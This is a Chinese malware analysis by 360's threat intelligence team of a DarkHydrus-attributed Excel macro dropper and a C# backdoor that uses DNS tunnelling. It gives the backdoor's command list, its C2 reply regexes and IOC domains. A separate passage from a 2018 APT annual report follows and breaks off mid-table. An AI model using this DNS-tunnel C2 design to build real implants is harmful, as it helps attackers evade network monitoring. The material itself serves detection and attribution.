
Dropper(Macros)

MD5 5c3f96ade0ea67eef9d25161c64e6f3e
文件名 الفهارس.xlsm(indexes. xlsm)
MD5 8dc9f5450402ae799f5f8afd5c0a8352
文件名 الاطلاع.xlsm(viewing. xlsm)

以下分析均以MD5:5c3f96ade0ea67eef9d25161c64e6f3e的样本为例,诱饵文档是一个OfficeExcel文档,名为الفهارس.xlsm(指标.xlsm)。其内嵌VBA宏,当受害者打开文档并启用宏后,将自动执行恶意宏代码。

该恶意宏代码的功能为释放WINDOWSTEMP.ps1和12-B-366.txt文件到%TEMP%目录,最后使用regsvr32.exe启动12-B-366.txt文件:

dd53d25afe8351da81c3bfd64ff1ffde.png

实际上12-B-366.txt是一个HTA(HTML应用程序)文件,该文件用于启动释放出来的PowerShell脚本:%TEMP%\\ WINDOWSTEMP.ps1

3e9b26b2293c12cb70c87a3a09b2545e.png

WINDOWSTEMP.ps1脚本内容如下,该PowerShell脚本使用Base64和gzip解码和解压缩脚本里的content,然后写入到文件:%TEMP%\\OfficeUpdateService.exe,最后运行%TEMP%\\OfficeUpdateService.exe:

4c1af717b36953c61081d270be296b21.png

Backdoor(OfficeUpdateService.exe)

MD5 b108412f1cdc0602d82d3e6b318dc634
文件名 OfficeUpdateService.exe
PDB路径 C:\Users\william\Documents\Visual Studio  2015\Projects\DNSProject\DNSProject\obj\Release\DNSProject.pdb
编译信息 Jan 08 14:26:53 2019  Microsoft Visual C# v7.0 / Basic .NET  (managed)

释放执行的后门程序使用C#编写:

image.png

样本PDB路径信息和其使用的通信技术有很强的关联性,指示其使用了DNS相关的技术:

后门程序运行后会先检查参数是否包含“st:off”和“pd:off”,如果包含“st:off”则不会写启动项,如果包含“pd:off”则不会释放PDF文件。随后检测是否运行在虚拟机、沙箱中,或者是否被调试等,通过这些检查后最终执行恶意代码:

7649d9af7e7e91fed1a403e865ad3a84.png

写入启动项的持久化操作:

1a3d0ef4d8280aac53f98b41f6460ab5.png

释放诱饵PDF文件:

image.png

执行虚拟机、沙箱检测以及反调试等操作:

ca6bfcff8842ff62f2ff5d87a8e9e432.png

紧接着获取主机信息:

image.png

17a14e2687cc947367440b71108f10a1.png

然后通过DNS隧道发送搜集到的主机信息,其中DNS隧道通信部分封装到queryTypesTest函数中:

a1f267ea496adc9dde88cbd715b22d54.png

最后进入命令分发循环, 该命令分发流程首先判断是否是x_mode模式,如果不是,则通过DNS隧道技术与C2通信获取需要执行的指令,否则通过HTTP传输数据:

a2464d30f473af356be99e64b8a2281e.png

与C2通过DNS隧道建立通信,并解析返回的数据,然后提取指令,最后通过taskHandler函数分发指令:

image.png

以下是部分指令截图:

76ccd47cb3b57e5dea5abb11bbe7f904.png

值得注意的是,^\\$x_mode指令将设置文件上传下载的服务器,服务器地址通过DNS隧道获取:

image.png

其中一个样本指定了服务器为GoogleDrive服务器:

fe26e127473d927a5c5504d97191a30b.png

所有命令列表如下:

命令 功能
^kill 结束线程?进程
^\\$fileDownload 文件下载
^\\$importModule 获取进程模块
^\\$x_mode 采用x_mode模式,此模式设置RAT服务器,然后采用HTTP发送RAT数据
^\\$ClearModules 卸载模块
^\\$fileUpload 文件上载
^testmode 测试某个模块
^showconfig 获取配置信息
^changeConfig 更改配置
^slp 睡眠一段时间
^exit 退出进程

DNS隧道通信分析

DNS隧道通信技术是指通过DNS查询过程来建立通信隧道。该通信方式有极强的隐蔽性,容易穿透各种流量网关的检测。

实现DNS隧道通信技术主要有两种方法:

1.指定DNS服务器实现DNS隧道通信;

2.通过域名提供商提供的接口修改NS记录,将解析域名的DNS服务器指定为攻击者的DNS服务器,接管域名的DNS解析请求。

本文所描述的后门程序OfficeUpdateService.exe使用的则是第二种方式实现DNS隧道通信,其主要原理为修改木马程序需要解析的域名的NS记录,由于DNS解析过程会首先尝试向NS记录指定的DNS服务器请求解析域名,所以NS记录指定的DNS服务器能收到DNS查询请求以及附带的数据。如果域名对应的NS记录中的DNS服务器是由攻击者控制的,那么攻击者就可以通过该DNS服务器与木马程序通过DNS查询建立起特殊的通信渠道。

木马程序请求的域名列表如下:

image.png

设置NS记录

NS(Name Server)记录是域名服务器记录,用来指定该域名由哪个DNS服务器来进行解析。

攻击者首先将相关域名的NS记录修改为了攻击者控制的DNS服务器,攻击者指定用于解析相关域名的NS服务器为:tvs1.trafficmanager.live,tvs2.trafficmanager.live,我们通过nslookup可以查询得到:

image.png

样本再通过本机的nslookup程序向相关域名提交请求,而由于这些域名的NS记录被指定为了攻击者的DNS服务器(tvs1.trafficmanager.live),故nslookup提交的查询信息会被发送给攻击者的DNS服务器,然后读取DNS服务器返回的信息进行数据交互。所以样本其实是在和攻击者控制的DNS服务器进行最终的通信。

样本使用nslookup解析域名并附带以下参数:timeout(请求超时时间)、q(DNS请求类型):

image.png

发送上线请求并获取执行指令

木马会根据不同的查询类型,使用不同的正则表达式去匹配DNS服务器返回的结果数据。

比如执行nslookup并使用查询类型为A进行查询,最终使用以下正则表达式匹配返回的数据结果:

image.png

而样本首先会通过向攻击者控制的DNS服务器发送DNS查询请求来发送当前木马的上线ID给攻击者。首先获取当前的进程ID,并与请求查询的域名组成一个二级域名,依次使用nslookup指定DNS的查询类型发送DNS查询信息:

image.png

接着根据当前DNS请求的类型分别用不同的正则表达式规则匹配其返回的数据结果,并取取其中的数据:

image.png

我们手动模拟使用TXT查询请求并上传木马ID的过程如下:

首先我们构造一个二级域名:ajpinc.akamaiedge.live,二级域名ajpinc中的a代表第一次请求,末尾的c代表结尾,a和c之间是编码过后的当前进程ID。然后我们使用nslookup发送该请求,执行的效果如下:

image.png

而木马程序会使用以下正则表达式来匹配返回的数据结果:

(\\w+).(akdns.live|akamaiedge.live|edgekey.live|akamaized.live)

该正则表达式会匹配上述结果中的ajpinc和ihn字符串,然后将ihn通过指定的解码函数解码得到“107”,解码函数如下:

image.png

最后获取当前的配置信息,再通过DNS协议传输给攻击者控制的DNS服务器,并持续发送DNS请求,最终分别使用不同的正则表达式来匹配返回的结果,获取下一步需要执行的指令。

数据匹配规则

样本主要使用的DNS查询类型如下:

A
AAAA
AC
CNAME
TXT
SRV
SOA
MX

木马会根据不同的查询类型,使用不同的正则表达式去匹配攻击者的DNS服务器返回的结果数据。

比如执行nslookup并使用查询类型AC得到返回的数据,并使用以下正则表达式匹配返回的数据结果:

image.png

使用查询类型为AAAA得到的数据使用以下正则表达式匹配返回的数据结果:

image.png

使用其他DNS查询类型得到的数据使用以下正则表达式匹配返回的数据结果:

image.png

样本所使用的DNS查询类型及返回数据对应匹配的正则表达式如下:

DNS查询类型 匹配结果的正则表达式
A Address:\\s+(\\d+.\\d+.\\d+.\\d+)
AC ([^r-v\\s]+)[r-v]([\\w\\d+\\/=]+)-\\w+.(<C2DOMIAN>)
AAAA Address:\\s+(([a-fA-F0-9]{0,4}:{1,4}[\\w|:]+){1,8})
CNAME、TXT、SRV、SOA、MX ([^r-v\\s]+)[r-v]([\\w\\d+\\/=]+)-\\w+.(<C2DOMIAN>)和(\\w+).(<C2DOMIAN>)

如果当返回的DNS请求结果中被:

"216.58.192.174|2a00:1450:4001:81a::200e|2200::|download.microsoft.com|ntservicepack.microsoft.com|windowsupdate.microsoft.com|update.microsoft.com"

正则表达式命中,则代表请求被取消,则不会执行后续的操作:

image.png

溯源与关联

360威胁情报中心通过对样本详细分析后发现,此次攻击的幕后团伙疑似为DarkHydrus APT组织,部分关联依据如下。

样本使用DNS隧道进行通信

与之前Palo Alto披露[2]的木马类似的,都使用了相同的DNS隧道通信技术:

image.png

高度一致的沙箱检测代码和后门功能代码

几乎完全一致的虚拟机、沙箱检测代码:

image.png

恶意代码相似度极高,木马功能也高度相似:

image.png

拓展

有趣的是,我们关联到某个Twitter用户@darkhydrus2的昵称为SteveWilliams,该用户名与DarkHydrus吻合,且昵称williams与此次C#编写的木马程序的PDB路径又有些关联:

image.png

总结

从近年来的高级攻击事件分析中可以看出,由于利用Office 0day等漏洞进行攻击的成本较高,多数攻击者更趋向于利用Office VBA宏执行恶意代码。企业用户应尽可能小心打开来源不明的文档,如有需要可通过打开Office文档中的:文件-选项-信任中心-信任中心设置-宏设置,来禁用一切宏代码执行。

image.png

目前,基于360威胁情报中心的威胁情报数据的全线产品,包括360威胁情报平台(TIP)、天眼高级威胁检测系统、360 NGSOC等,都已经支持对此类攻击的精确检测。

IOC

MD5
5c3f96ade0ea67eef9d25161c64e6f3e
8dc9f5450402ae799f5f8afd5c0a8352
b108412f1cdc0602d82d3e6b318dc634
039bd47f0fdb6bb7d68a2428c71f317d
PDB路径
C:\Users\william\Documents\Visual Studio  2015\Projects\DNSProject\DNSProject\obj\Release\DNSProject.pdb
CC地址
0ffice365.life
0ffice365.services
0nedrive.agency
akamai.agency
akamaiedge.live
akamaiedge.services
akamaized.live
akdns.live
azureedge.today
cloudfronts.services
corewindows.agency
edgekey.live
microsoftonline.agency
nsatc.agency
onedrive.agency
phicdn.world
sharepoint.agency
skydrive.agency
skydrive.services
t-msedge.world
trafficmanager.live

参考链接

[1].https://ti.360.net/blog/articles/analysis-of-settingcontent-ms-file/

[2].https://unit42.paloaltonetworks.com/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/

[3].https://ti.360.net/

[4].https://twitter.com/craiu/status/1083305994652917760

*本文作者:360天眼实验室,转载请注明来自FreeBuf.COM

序  言

Threat Actor(即威胁行为体),在威胁情报中用于描述实施网络攻击威胁的个人、团伙或组织以达到其恶意的动机和意图。

威胁行为体,是为了标记对实施网络威胁攻击的人、团伙或者组织而建立的虚拟实体。通常将攻击者或其实施的攻击行动赋予独有的代号,以便于从广泛的攻击活动中识别、区分归属于该攻击来源相关的并进行持续性的威胁活动跟踪。以攻击者的维度持续跟踪威胁活动,持续完善攻击者画像的拼图,能够更好的完成挖掘威胁攻击背后的动机,追溯攻击真实的来源,研究攻击技术的演变,提供更有效的安全防御策略。

结合2018年全年国内外各个安全研究机构、安全厂商披露的威胁活动,以及近几年来历史披露的高级持续性威胁活动,通常APT组织和网络犯罪组织的威胁尤为关注,其往往能够对行业、企业和机构造成更严重的影响,并且更加难于发现和防御。

APT组织,通常具有国家或情报机构背景,或者专门实施网络间谍活动,其攻击动机主要是长久性的情报刺探、收集和监控,也会实施如牟利和破坏为意图的攻击威胁。APT组织主要攻击的目标包括政府、军队、外交、国防外,也覆盖科研、能源以及国家基础设施性质的行业和产业。

网络犯罪组织主要以牟取经济利益而实施攻击活动,近年来,数个活跃的网络犯罪组织也呈现出明确的组织化特点,并且使用其自身特色的攻击工具和战术技术。网络犯罪组织对于如金融、银行、电子商务、餐饮零售等行业带来了巨大的资金损失和业务安全风险。

本报告是360威胁情报中心基于收集的公开威胁情报和内部产生的威胁情报数据,对2018年全年高级持续性威胁相关研究的总结报告,主要内容分成三个部分:

1)高级持续性威胁背后的攻击者

结合全年国内外各个安全研究机构、安全厂商披露的高级威胁活动报告内容的统计分析,对2018年高级威胁类攻击态势进行总结。

2)针对中国境内的APT组织和威胁

基于360威胁情报中心内部对多个针对中国境内的APT组织持续跟踪,包括海莲花、摩诃草、Darkhotel、蓝宝菇、毒云藤等组织都在2018年对中国境内目标机构和人员频繁实施攻击活动,这里对上述组织相关攻击活动进行回顾。

3)APT威胁的现状和挑战

最后总结APT威胁的现状和应对APT威胁所面临的挑战,并对APT威胁的变化趋势进行合理的预测。

主要观点

网络间谍活动变得更加普遍化,这对高级持续性威胁活动的持续跟踪带来一些挑战。我们需要更加明确的区分和识别高级持续性威胁攻击,以及能够明确来源归属的攻击组织。而对于不能明确归属的APT威胁,需要依赖于持续的威胁跟踪和更多的数据证据佐证。

APT威胁的归属问题正在变得更加明显,其原因可能包括攻击者不断变化的攻击武器和使用更加匿名化的控制基础设施,以及引入的false flag或刻意模仿的攻击战术技术,一些成熟而完善的公开渗透工具给攻击者带来了更好的选择。

2018年,360公开披露了两个新的针对中国境内的APT组织,以及多个针对中国境内频繁的APT威胁活动,可以看到随着我国在国际形势中的日益发展,地缘政治、外交形势等立场下高级持续性威胁将变得更加严峻。

2018年多次曝光的在野0 day攻击的发现,展现了APT攻击者的技术能力储备和提升,威胁的攻击和防御变得更加白热化,APT威胁的防御和响应的时效性变得尤为重要。

威胁攻击者也在发掘一些新的攻击方式,也包括使用了部分“陈旧而古老”的技术特性,绕过或逃避威胁检测机制从而实施攻击,结合目标人员的安全意识弱点往往也能够取得不错的攻击效果。

摘要

360威胁情报中心在2018年监测到的高级持续性威胁相关公开报告总共478篇,其中下半年报告披露的频次和数量明显高于上半年。从公开报告的发布渠道统计来看,2018年国内安全厂商加大了对高级威胁攻击事件及相关攻击者的披露频率,其中360来源披露的高级威胁类报告数量处于首位,并且明显超过其他安全厂商。

在对APT威胁攻击的持续跟踪过程中,通常会将明确的 APT 攻击行动或攻击组织进行命名,用于对攻击背后实际的攻击组织映射成一个虚拟的代号,以便更好的区分和识别具体来源的攻击活动。历史披露的明确的APT攻击组织至少有80个。

截至目前,360威胁情报中心明确的针对中国境内实施攻击活动的,并且依旧活跃的 公开APT 组织,包括海莲花,摩诃草,蔓灵花,Darkhotel,Group 123,毒云藤和蓝宝菇,其中毒云藤和蓝宝菇是360在2018年下半年公开披露并命名的 APT 组织。

APT威胁也不再是APT组织与安全厂商之间独有的“猫和老鼠”的游戏,还作为国家与国家之间博弈以及外交舆论层面的手段。例如美国司法部在2018年就多次公开指控了被认为是他国黑客成员对其本土的网络威胁活动,最为详细的就是指控朝鲜黑客PARKJIN HYOK历史涉及的攻击活动,而过去影子经纪人曝光的NSA网络武器库资料,维基解密曝光的Vault 7项目以及卡巴斯基披露的Slingshot攻击行动都被认为与美国本土情报机构有关。

第一章 公开披露的全球高级持续性威胁

360威胁情报中心在2018年持续对高级持续性威胁相关的公开报告进行收集,其中包括但不限于以下类型。

APT攻击团伙报告、APT攻击行动报告、疑似APT的定向攻击事件、和APT攻击相关的恶意代码和漏洞分析,以及我们认为需要关注的网络犯罪团伙及其相关活动。

国内外安全厂商、安全研究人员通常会对高级持续性威胁活动涉及的攻击团伙、攻击活动进行命名,并以”Actor / Group / Gang”等对威胁背后的攻击者进行称谓,其中包括了明确的APT组织,明确的网络犯罪团伙,以及暂时不太明确攻击者信息的攻击活动命名。

不同的安全厂商有时候会对同一背景来源的威胁进行不同的别名命名,这取决于其内部在最早跟踪威胁活动时的命名约定,所以往往需要根据威胁攻击的同一来源进行归类。

我们结合上述说明对自身收集渠道收集的公开报告内容进行分析,并从公开披露的信息中公布全球高级持续性威胁的态势情况。

一、数量和来源

360威胁情报中心在2018年监测到的高级持续性威胁相关公开报告总共478篇,其中下半年报告披露的频次和数量明显高于上半年。

image.png

从公开报告的发布渠道统计来看,2018年国内安全厂商加大了对高级威胁攻击事件及相关攻击者的披露频率,其中360来源披露的高级威胁类报告数量处于首位,并且明显超过其他安全厂商。

从不同安全厂商披露的相关攻击者、攻击行动以及其中明确的APT组织数量来看,国内安全厂商也和国外主流安全厂商,如 Palo Alto Networks、卡巴斯基、趋势相差无几。在本报告的第二章中我们将介绍对APT组织定义的看法。

image.png

二、受害目标的行业与地域

在所有网络攻击活动中,APTAPT攻击能够对行业、企业和机构造成更严重的影响,并且更加难于发现和防御,APT攻击的背后是APT组织和网络犯罪组织。

2018年1-12月,360威胁情报中心共监测到全球99个专业机构(含媒体)发布的各类APT研究报告478份,涉及相关威胁来源109个,其中APT组织53个(只统计了有明确编号或名称的APT组织),涉及被攻击目标国家和地区79个。

报告显示,政府、外交、军队、国防依然是 APT 攻击者的主要目标,能源、电力、医疗、工业等国家基础设施性行业也正面临着APT攻击的风险。而金融行业主要面临一些成熟的网络犯罪团伙的攻击威胁,如MageCart、Cobalt Group等等,其组织化的成员结构和成熟的攻击工具实现对目标行业的规模化攻击,这与过去的普通黑客攻击是完全不同的。除了针对金融、银行外,电子商务、在线零售等也是其攻击目标。

image.png

高级威胁活动涉及目标的国家和地域分布情况统计如下图(摘录自公开报告中提到的受害目标所属国家或地域),可以看到高级威胁攻击活动几乎覆盖了全球绝大部分国家和区域。

image.png

三、威胁攻击者

进一步对公开报告中高级威胁活动中命名的攻击行动名称、攻击者名称,并对同一背景来源进行归类处理后的统计情况如下,总共涉及109个命名的威胁来源命名。基于全年公开披露报告的数量统计,一定程度可以反映威胁攻击的活跃程度。

image.png

从上述威胁来源命名中,我们认为明确的APT组织数量有53个(在下一章将介绍我们对APT组织定义的看法)。

其中,明确的针对中国境内实施攻击活动的,并且依旧活跃的公开APT组织,包括海莲花,摩诃草,蔓灵花,Darkhotel,Group123,毒云藤和蓝宝菇,其中毒云藤和蓝宝菇是360在2018年下半年公开披露并命名的APT组织。

对APT组织相关披露报告数量统计如下。

image.png

第二章 高级持续性威胁背后的攻击者

APT 威胁,通常作为与地缘政治、情报活动意图下的网络间谍活动,实施长久性的情报刺探、收集和监控。实施 APT 攻击的攻击组织,通常具有国家、政府或情报机构背景,其拥有丰富的资源用于实施攻击活动。

在对 APT 威胁攻击的持续跟踪过程中,通常会将明确的 APT 攻击行动或攻击组织进行命名,用于对攻击背后实际的攻击组织映射成一个虚拟的代号,以便更好的区分和识别具体来源的攻击活动。

在对历史公开的 APT威胁的研究过程中,我们发现对 APT 类威胁的大量命名,给实际的 APT 威胁归属问题的分析带来了困扰,需要更加明确的对实施 APT 攻击的攻击组织进行区分,并用于追溯真实的攻击组织实体。

我们结合部分公开对攻击组织的研究成果[2][3](具体文档内容参见附录链接),提出我们对 APT 攻击组织的一些判别标准:

APT 组织实施的攻击行动具有明确的意图和目的,其表现在每次攻击活动的目标是针对性选择的,攻击最终达到的目标通常与地缘政治、情报活动等相符。

APT 组织实施的攻击活动不仅体现在时间跨度的长久,并且具备延续性,即可能针对多个不同的攻击目标群体和多次分阶段的攻击尝试。由于通常无法看到 APT 组织所有攻击活动的全貌,需要依赖于多个外部情报来源的作证。

APT 组织实施攻击的过程中使用了其特有的战术技术,并往往拥有其特有的攻击工具,即使在后续的攻击活动中攻击者可能选择变换其攻击的手法,但依然会保持过去的一些攻击特征。

在追溯 APT 组织的攻击活动过程中,能够明确追溯到攻击者所在的地域或找到对应真实攻击者身份的虚拟标识信息。

依据上述标准,我们认为历史披露的明确的 APT 攻击组织至少有80个。

一、活跃的国家背景组织

在2018年中360威胁情报中心发布的高级持续性威胁报告中,我们按照区域性划分,介绍了部分 APT 攻击组织,例如APT28、APT29、Lazarus Group等,这些APT组织在下半年继续保持较为频繁的攻击活动并多次被安全厂商公开披露,我们在这里对其下半年的主要活动情况进行介绍。

(一)APT28

APT28组织在下半年继续使用其Zebrocy恶意载荷对全球范围的政府、军队、外交领域的目标人员和机构实施网络间谍活动。

Zebrocy是APT28专用的攻击工具集,主要目的是用作侦察(收集上传系统信息和截屏)和部署下一阶段的攻击载荷,其包含了.NET、AutoIT、Delphi、C++、PowerShell和Go多种语言开发的形态。安全厂商也发现该组织使用新的攻击恶意代码Cannon[64],其使用邮件协议作为C2的通信方式。

APT28组织下半年的主要攻击活动如下:

披露时间 披露来源 概述
2018.7.28 Security Affairs APT28组织对美国民主党参议员Claire  McCaskill及其工作人员在2018年的竞选连任进行攻击的准备和尝试[65]
2018.9.27 ESET ESET发现APT28组织实现的UEFI  rootkit攻击巴尔干半岛及中欧和东欧的政府组织。[66]
2018.10.4 Symantec 安全厂商对APT28在2017-2018年期间针对欧洲和南美的军队和政府目标攻击活动的披露。[67]
2018.11.20 ESET ESET发现APT28从2018年8月使用了两个新的Zebrocy攻击组件,并用于攻击中亚,东欧和中欧,针对大使馆、外交部、外交官[68]
2018.11.29 Accenture Security APT28组织被命名为SNAKEMACKEREL  的攻击行动,英国和荷兰政府都公开将SNAKEMACKEREL活动归功于俄罗斯军事情报局(RIS)[69]
2018.12.12 Palo Alto Networks 安全厂商对APT28组织从2018年10月17日到2018年11月15日的多个用于鱼叉邮件攻击的恶意文档的总结分析,其文档作者或修订者的名称均为Joohn  [70]

表1  APT28组织在2018下半年公开披露的主要活动情况

(二)APT29

APT29组织在2018年频繁实施对目标行业和人员的鱼叉式网络钓鱼活动[71][72],包括针对美国的军事机构、执法、国防承包商、媒体公司、制药公司等。其实施鱼叉攻击用于投放恶意的LNK文件,其中利用了其组织特有的一种LNK文件格式的利用技术[73]。

image.png

其执行内嵌的PowerShell脚本命令,并从LNK文件附加的数据中解密释放恶意载荷和诱导的PDF文档文件。

image.png

(三)LazarusGroup(APT-C-26)

安全厂商对于Lazarus Group所属的攻击活动的区分开始变得不是特别的明确,部分安全厂商开始采用独立命名的组织名称来识别针对特定地域或者特定行业的攻击活动,我们在年中APT报告中也提及了Lazarus Group和一些子组织的命名与关系。

FireEye也对其中经济动机的攻击活动归属为新的APT组织代号,即APT38,该组织情况在文章后续会进行介绍。

这里列举了安全厂商披露的和Lazarus Group有关的攻击活动,或者疑似与其有关。

披露时间 披露来源 概述
2018.8.15 360 360高级威胁应对团队披露了疑似该组织模仿开源交易软件“Qt  Bitcoin Trader”开发了一款名为“Celas  Trade Pro”的数字加密货币交易软件的攻击活动,并同时针对Windows和Mac平台。[74]
2018.8.24 Check Point 安全厂商发现命名为Ryuk  的勒索软件的定向攻击,其与HERMES  在代码上保持诸多相似,而HERMES  归属Lazarus  [75]
2018.8.28 Securonix Securonix安全专家披露Lazarus对印度银行Cosmos  Bank的攻击,其在8月10日-13日造成了超过9.4亿卢比(1350万美元)资金被盗取。[76]
2018.10.2 US-CERT 美国DHS发布HIDDEN  COBRA 针对ATM攻击的预警[77]
2018.11.20 Trend Micro 趋势科技披露Lazarus组织在11月份针对亚洲和非洲的ATM上的攻击,窃取了数百万美元。其也在9月对拉丁美洲的几家金融机构实施了攻击。[78]
2018.12.13 McAfee 安全厂商披露攻击行动Operation  Sharpshooter,针对全球的核,防御,能源和金融公司,其植入物疑似来自Lazarus的Duuzer后门代码[79]

表2  Lazarus Group组织在2018下半年公开披露的主要活动情况

二、值得关注的APT攻击者

除了上述活跃的APT组织外,我们在这里还对其他多个值得关注的 APT 组织情况进行简要的介绍。

(一)肚脑虫(APT-C-35)

肚脑虫,ARBOR NETWORKS也称其为Donot Team [4]。该组织最早的攻击活动可以追溯到2016年,其主要针对巴基斯坦和克什米尔地区的目标人员。其使用了两种特定的攻击恶意框架,EHDevel和 yty,命名取自恶意代码中的 PDB 路径信息。该组织使用的攻击载荷使用了多种语言开发,包括C++、.NET、Python、VBS和AutoIt。

360威胁情报中心发现了该组织以“克什米尔问题”命名的诱饵漏洞文档并利用了CVE-2017-8570 漏洞[5],其主要的攻击流程如下图。

image.png

后续又发现该组织利用内嵌有恶意宏代码的 Excel文档针对中国境内的巴基斯坦重要商务人士实施的攻击[6],并向被控主机下发了多种载荷模块文件。

image.png

360烽火实验室也发现了该组织针对移动终端的攻击样本,并复用了部分控制基础设施[9]。

image.png

下表列举了肚脑虫组织在2018年主要活动的披露情况:

披露时间 披露来源 概述
2018.3.8 ARBOR NETWORKS 安全厂商披露Donot  Team从2018年1月以后使用的新的恶意代码框架yty,用于文件收集、截屏和键盘记录,并用于攻击南亚的目标。[4]
2018.7.26 360 360威胁情报中心发现伪装成克什米尔问题的漏洞文档。[5]
2018.8.14 360 360烽火实验室发现一个伪装成克什米尔新闻服务应用的RAT程序,并共用了控制基础设施。[9]
2018.12.12 360 360威胁情报中心再次发现该组织从2018年5月起针对中国境内的巴基斯坦重要商务人士的持久性攻击活动。[6]

表3  肚脑虫组织在2018年公开披露的主要活动情况

(二)蔓灵花

蔓灵花,是一个由360命名的 APT 组织,其他安全厂商也称其为 BITTER,该组织同样活跃在南亚地区。该组织最早的攻击活动可以追溯到2013年,并且至今仍旧活跃。该组织主要针对巴基斯坦,360在过去也发现过其针对中国境内目标的攻击活动。

蔓灵花组织主要使用鱼叉邮件攻击,并向目标人员投放漏洞文档文件,其中包括针对 Office 的漏洞文档和InPage文字处理软件的漏洞文档(InPage是一个专门针对乌尔都语使用者即巴基斯坦国语设计的文字处理软件)。

360威胁情报中心重点分析了其利用 InPage 漏洞(CVE-2017-12824)的相关攻击样本和漏洞利用细节[10],并发现该组织与同样活跃在南亚地区范围的其他 APT 组织的联系。

(三)Group 123

Group 123,又称Reaper group,APT37,Geumseong121,Scarcruft。该组织被认为是来自朝鲜的另一个频繁活跃的 APT攻击组织,其最早活跃于2012年,该组织被认为与2016年的Operation Daybreak和Operation Erebus有关。

Group 123组织早期的攻击活动主要针对韩国,2017年后延伸攻击目标至半岛范围,包括日本,越南和中东。其主要针对工业垂直领域,包括化学品、电子、制造、航空航天、汽车和医疗保健实体[11]。360威胁情报中心也曾发现该组织针对中国境内目标的攻击活动。

该组织在过去实施的攻击活动中主要以情报窃取为意图,并呈现出一些其特有的战术技术特点,包括:

同时拥有对 PC(Windows)和 Android 终端的攻击武器;

对韩国网站实施入侵并作为攻击载荷分发和控制回传渠道,或者使用云盘,如 Yandex、Dropbox 等作为攻击载荷分发和控制回传渠道;

使用 HWP 漏洞对韩国目标人员实施鱼叉攻击[12]。

Group 123组织的相关攻击活动在2018年被频繁披露,下表列举了其公开的主要活动情况。

披露时间 披露来源 概述
2018.1.16 Cisco Talos Talos总结了Group  123组织从2017年到2018年对韩国目标实施的六次攻击行动,包括:Golden  Time,Evil  New Year,Are  you Happy,FreeMilk,North  Korean Human Rights和Evil  New Year 2018。[37]
2018.2.1 ESTsecurity 利用CVE-2018-4878  Flash Player 0day漏洞对韩国实施鱼叉攻击,其将该组织也称为Geumseong121,后续多家安全厂商对该0day漏洞和攻击细节进行了分析。[38]
2018.2.20 FireEye FireEye将其命名为APT37,也称Reaper,并指出其为朝鲜的攻击者。[39]
2018.4.2 Cisco Talos 安全厂商对一个虚假的防病毒恶意软件KevDroid的分析[45],并且多家安全厂商对其相关分析和归属的判断[47][48]。
2018.5.3 AhnLab 韩国安全厂商详细披露了该组织在过去的攻击活动分析报告,将其命名为Red  Eyes。[40]
2018.5.31 Cisco Talos Talos发现一个针对韩国的恶意HWP文档,其伪装成美国朝鲜首脑会议的韩语标题,并从失陷网站上下载NavRAT。[41]
2018.8.22 ESTsecurity 韩国安全厂商披露Operation  Rocket Man,分析了其针对Windows和Android两个平台的攻击活动。[46]
2018.10.1 Palo Alto Networks 安全厂商在跟踪分析NOKKI恶意代码家族时,发现其与Reaper组织有关,该恶意代码家族主要以政治动机攻击俄语和柬埔寨语的人员和组织。[42]
2018.11.8 360 360威胁情报中心发现疑似该组织使用的HWP软件0day样本[12],后续韩国安全厂商确认了该样本与Operation  Korean Sword行动的联系。[43]
2018.12.13 ESTsecurity 韩国安全厂商披露Operation  Blackbird,主要为该组织实施针对移动终端的攻击活动。[44]

表4  Group 123组织在2018年公开披露的主要活动情况

(四)APT38

美国司法部在2018年9月公开披露了一份非常详细的针对朝鲜黑客PARK JIN HYOK及其相关组织Chosun Expo 过去实施的攻击活动的司法指控[8]。在该报告中指出PARK黑客及其相关组织与过去 SONY 娱乐攻击事件,全球范围多个银行 SWIFT 系统被攻击事件, WannaCry,以及韩国、美国军事人员和机构被攻击的相关事件有关。上述相关事件在过去也多次被国内外安全厂商归属为朝鲜的 APT 组织 Lazarus。

FireEye在后续发布 APT38组织报告[7],并将以全球金融机构和银行为目标,窃取巨额在线资金为动机的APT 威胁活动归属为 APT38,以区分Lazarus Group。

从美国 DoJ 和 FireEye 的报告中我们也可以看到美国情报机构和安全厂商对 APT 活动的取证和情报溯源的方式,其用于APT 威胁分析溯源的数据留存时间跨度之长和广泛的情报数据积累是其能够回溯到真实世界攻击者身份的基础。

(五)Hades

Hades组织,其最早被发现和披露是因为在2017年12月22日针对韩国平昌冬奥会的攻击,其向冬奥会邮箱发送带有恶意附件的鱼叉邮件,投递韩文的恶意文档,并将控制域名伪装为韩国农林部域名地址。

该组织使用了被命名为Olympic Destroyer的恶意代码,其对目标主机系统具有破坏性。其中OlympicDestroyer的代码实现与 Lazarus 使用的破坏性恶意代码存在一些相似性,被认为可能是攻击者刻意引入的 false flag。

Hades 的来源归属到目前为止,依然没有非常明确的定论,结合公开披露的报告,一种来源是可能来自朝鲜,一种被认为和俄罗斯 APT28组织有关[14]。后续安全厂商也发现其新的攻击样本,证明该组织依旧保持活跃[14][15]。

在这里我们也列举了多个安全厂商对Hades组织的活动和攻击武器的主要研究情况。 

披露时间 披露来源 概述
2018.1.6 McAfee 安全厂商对韩国平昌奥运会遭受攻击的事件的响应的分析披露[49]。
2018.2.2 McAfee McAfee再次披露韩国平昌奥运会攻击事件的相关分析进展并称其为Gold  Dragon [50]。
2018.2.25 SecurityWeek 华盛顿邮报报道称,俄罗斯军方间谍攻击冬奥会组织者使用的数百台计算机并试图使其看起来像朝鲜的攻击。[51]
2018.2.26 Cisco Talos 安全厂商总结冬奥会事件归属问题的分析[52]。
2018.3.8 Kaspersky 卡巴斯基对冬奥会攻击事件的分析[53]。
2018.6.19 Kaspersky 卡巴斯基发现该组织新的鱼叉攻击活动,并认为其TTP和APT28存在一些相似[54]。
2018.11.15 Check Point 安全厂商对其使用的新Dropper程序的分析[55]。

表5  Hades组织在2018年公开披露的主要活动情况

(六)MuddyWater

MuddyWater,也被称为TEMP.Zagros,Seedworm。其最早曝光的攻击活动于2017年,主要针对中东和中亚,实施频繁的网络间谍活动。该组织常用PowerShell 实现的攻击后门POWERSTATS。

MuddyWater也曾多次向安全研究人员发起“挑衅”[16][17]。

image.png

image.png

下表列举了该组织在2018年的主要活动情况。

披露时间 披露来源 概述
2018.3.12 Trend Micro 安全厂商发现针对土耳其,巴基斯坦和塔吉克斯坦组织的活动,该活动涉及多个国家的不同行业,主要是在中东和中亚,并且使用了中文字符串的false  flag[56]。
2018.3.13 FireEye FireEye认为其是来自伊朗的威胁组织[57]。
2018.6.14 Trend Micro 该组织在2017年起针对沙特阿拉伯政府的攻击[58]。
